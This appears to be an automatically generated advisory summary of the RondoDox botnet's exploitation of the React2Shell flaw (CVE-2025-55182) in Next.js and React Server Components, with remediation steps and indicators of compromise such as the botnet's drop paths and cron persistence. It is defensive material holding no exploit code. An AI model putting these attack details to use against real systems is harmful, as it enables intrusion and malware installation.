Full Report
Cybersecurity researchers have disclosed details of a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector, CloudSEK said in an
Analysis Summary
# Vulnerability: React2Shell (RCE in React Server Components/Next.js) exploited by RondoDox Botnet
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: 10.0 (Critical)
- CWE: N/A (Based on description: Remote Code Execution via React Server Components/Next.js flaw)
## Affected Systems
- Products: React Server Components (RSC), Next.js applications
- Versions: Susceptible versions are implied by the existence of the flaw; users should check vendor guidance for specific vulnerable versions.
- Configurations: Devices and web applications running susceptible versions of Next.js or utilizing RSC. The attack specifically targeted IoT devices and web servers.
## Vulnerability Description
React2Shell is a critical security vulnerability found in React Server Components (RSC) and Next.js which enables unauthenticated attackers to achieve Remote Code Execution (RCE) on vulnerable devices. The RondoDox botnet campaign has been actively exploiting this flaw since late 2025 to gain initial access.
## Exploitation
- Status: Exploited in the wild (Used by the RondoDox botnet since at least December 2025)
- Complexity: Low (Implied by unauthenticated RCE being leveraged for mass infection)
- Attack Vector: Network (Initial access vector for C2 interaction and payload delivery)
## Impact
- Confidentiality: High (Potential for full system compromise, though primary observed impact is malware installation)
- Integrity: High (Ability to execute arbitrary code, install persistence mechanisms, and terminate other processes/malware)
- Availability: High (Installation of cryptocurrency miners and botnet loaders impacts system resources)
## Remediation
### Patches
- Specific patch versions were not detailed in the context, but organizations are advised to **update Next.js to a patched version as soon as possible.**
### Workarounds
- Segment all IoT devices into dedicated VLANs.
- Deploy Web Application Firewalls (WAFs).
- Block known Command and Control (C2) infrastructure associated with recent RondoDox activity.
## Detection
- **Indicators of Compromise (IOCs):** Scans attempting to drop files/check for paths such as `/nuts/poop` (for miners), `/nuts/bolts` (for the botnet loader/health checker), and `/nuts/x86` (for the Mirai variant).
- **Detection Methods and Tools:** Monitor for suspicious process execution on web hosts and IoT devices. Monitor network traffic for connections to known RondoDox C2 servers. Look for new cron jobs, particularly in `/etc/crontab`, related to unknown processes.
## References
- Vendor advisories for specific Next.js versions are required for definitive patching information.
- CloudSEK Analysis: defanged url not provided in text, summary based on researcher findings.
- Shadowserver Foundation Statistics: Statistics available regarding susceptible external IPs.
- Darktrace, Kaspersky, VulnCheck analyses mentioning abuse of CVE-2025-55182.